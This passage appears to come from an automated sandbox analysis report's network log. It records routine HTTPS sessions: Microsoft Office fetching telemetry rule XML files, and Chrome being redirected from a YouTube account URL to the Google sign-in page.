                                                                                                                                      2024-10-07 01:23:15 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      110192.168.2.44985613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:15 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1354
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                      ETag: "0x8DC582BE0662D7C"
                                                                                                                                      x-ms-request-id: d4fd285a-d01e-005a-06ed-167fd9000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012315Z-1657d5bbd48762wn1qw4s5sd3000000002rg000000002w88
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:15 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      111192.168.2.44985813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:15 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                      ETag: "0x8DC582BDF1E2608"
                                                                                                                                      x-ms-request-id: c9f5ea47-201e-0071-33fe-16ff15000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012315Z-1657d5bbd48tnj6wmberkg2xy800000002yg000000002wn0
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:15 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      112192.168.2.44985713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:15 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                      ETag: "0x8DC582BDCDD6400"
                                                                                                                                      x-ms-request-id: 4d5cca78-701e-0021-6ae5-163d45000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012315Z-1657d5bbd48wd55zet5pcra0cg00000002pg00000000r2hp
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:15 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      113192.168.2.44985913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:15 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:15 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1399
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                      ETag: "0x8DC582BE8C605FF"
                                                                                                                                      x-ms-request-id: 635e2ff4-801e-0035-1973-17752a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012315Z-1657d5bbd482lxwq1dp2t1zwkc00000002dg00000000vm6n
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:15 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      114192.168.2.449860142.250.181.2384432668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:15 UTC869OUTGET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/1.1
                                                                                                                                      Host: www.youtube.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-10-07 01:23:16 UTC2634INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:16 GMT
                                                                                                                                      Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
                                                                                                                                      Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
                                                                                                                                      P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Mon, 07-Oct-2024 01:53:16 GMT; Path=/; Secure; HttpOnly
                                                                                                                                      Set-Cookie: YSC=wQd_0utpaFU; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                      Set-Cookie: VISITOR_INFO1_LIVE=qkyi6csYLGo; Domain=.youtube.com; Expires=Sat, 05-Apr-2025 01:23:16 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                      Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXg%3D%3D; Domain=.youtube.com; Expires=Sat, 05-Apr-2025 01:23:16 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      115192.168.2.44986213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:16 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:16 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:16 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                      ETag: "0x8DC582BDC2EEE03"
                                                                                                                                      x-ms-request-id: 4d8e5842-701e-0021-0efe-163d45000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012316Z-1657d5bbd4824mj9d6vp65b6n400000002y000000000medc
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:16 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      116192.168.2.44986413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:16 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:16 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:16 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1399
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                      ETag: "0x8DC582BE1CC18CD"
                                                                                                                                      x-ms-request-id: cd0b82ba-d01e-0049-1304-17e7dc000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012316Z-1657d5bbd48p2j6x2quer0q02800000002yg00000000h2te
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      117192.168.2.44986313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:16 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:16 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:16 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                      ETag: "0x8DC582BEA414B16"
                                                                                                                                      x-ms-request-id: 8a56303a-c01e-0066-0f01-17a1ec000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012316Z-1657d5bbd48cpbzgkvtewk0wu000000002tg00000000pbrn
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:16 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      118192.168.2.44986113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:16 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:16 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:16 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                      ETag: "0x8DC582BDF497570"
                                                                                                                                      x-ms-request-id: 838d785c-001e-0014-24fe-165151000000
